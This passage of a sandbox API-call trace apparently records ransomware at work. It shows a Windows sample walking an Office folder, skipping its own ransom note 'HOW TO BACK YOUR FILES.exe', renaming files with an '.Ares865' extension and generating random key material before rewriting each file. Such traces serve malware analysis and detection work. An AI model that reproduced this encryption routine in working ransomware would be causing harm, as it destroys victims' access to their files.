| out: lpFileSize=0x2e2e4f0*=1110) returned 1 [0067.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.390] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.390] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.391] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x154 [0067.392] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x190000 [0067.397] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.398] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.398] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.398] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.398] CloseHandle (hObject=0x154) returned 1 [0067.399] CloseHandle (hObject=0x120) returned 1 [0067.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.399] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98487b00, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98487b00, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGBORDER.DPV", cAlternateFileName="")) returned 1 [0067.399] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.399] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="aoldtz.exe") returned 1 [0067.399] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML.Ares865") returned 70 [0067.399] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.xml.ares865"), dwFlags=0x1) returned 1 [0067.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.408] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2468) returned 1 [0067.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.408] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0067.409] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.409] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.409] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcb0, lpName=0x0) returned 0x164 [0067.410] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcb0) returned 0x190000 [0067.415] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.416] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.416] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.416] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.417] CloseHandle (hObject=0x164) returned 1 [0067.417] CloseHandle (hObject=0x12c) returned 1 [0067.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.417] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98487b00, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98487b00, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGBOXES.DPV", cAlternateFileName="")) returned 1 [0067.417] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.417] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="aoldtz.exe") returned 1 [0067.417] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML.Ares865") returned 69 [0067.417] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.xml.ares865"), dwFlags=0x1) returned 1 [0067.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.418] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=542) returned 1 [0067.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.418] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.419] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.419] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.419] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x154 [0067.441] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0x190000 [0067.449] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0067.449] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.449] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.450] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.450] CloseHandle (hObject=0x154) returned 1 [0067.450] CloseHandle (hObject=0x12c) returned 1 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.450] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1497e200, ftCreationTime.dwHighDateTime=0x1c6856f, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1497e200, ftLastWriteTime.dwHighDateTime=0x1c6856f, nFileSizeHigh=0x0, nFileSizeLow=0x35468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGCAL.DPV", cAlternateFileName="")) returned 1 [0067.450] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.450] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="aoldtz.exe") returned 1 [0067.451] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML.Ares865") returned 67 [0067.451] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.xml.ares865"), dwFlags=0x1) returned 1 [0067.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.457] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7782) returned 1 [0067.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.457] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0067.458] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.458] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.458] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2170, lpName=0x0) returned 0x154 [0067.459] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2170) returned 0x190000 [0067.460] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0067.461] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.461] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.461] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.461] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.462] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.462] CloseHandle (hObject=0x154) returned 1 [0067.462] CloseHandle (hObject=0x12c) returned 1 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.462] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca59dd00, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca59dd00, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGCHKBRD.DPV", cAlternateFileName="")) returned 1 [0067.462] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.462] lstrcmpiW (lpString1="DGCHKBRD.DPV", lpString2="aoldtz.exe") returned 1 [0067.462] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML.Ares865") returned 70 [0067.462] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml.ares865"), dwFlags=0x1) returned 1 [0067.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.467] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=670) returned 1 [0067.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.468] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0067.469] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.469] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.469] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x120 [0067.470] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x190000 [0067.471] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0067.472] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.472] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.472] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.472] CloseHandle (hObject=0x120) returned 1 [0067.472] CloseHandle (hObject=0x12c) returned 1 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.473] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x147eee00, ftCreationTime.dwHighDateTime=0x1c9c48f, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x147eee00, ftLastWriteTime.dwHighDateTime=0x1c9c48f, nFileSizeHigh=0x0, nFileSizeLow=0x49e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGCINFO.XML", cAlternateFileName="")) returned 1 [0067.473] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.473] lstrcmpiW (lpString1="DGCINFO.XML", lpString2="aoldtz.exe") returned 1 [0067.473] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML.Ares865") returned 69 [0067.473] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml.ares865"), dwFlags=0x1) returned 1 [0067.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.474] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1182) returned 1 [0067.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.475] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0067.475] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.475] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.476] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x154 [0067.477] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0067.478] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0067.479] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.479] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.479] 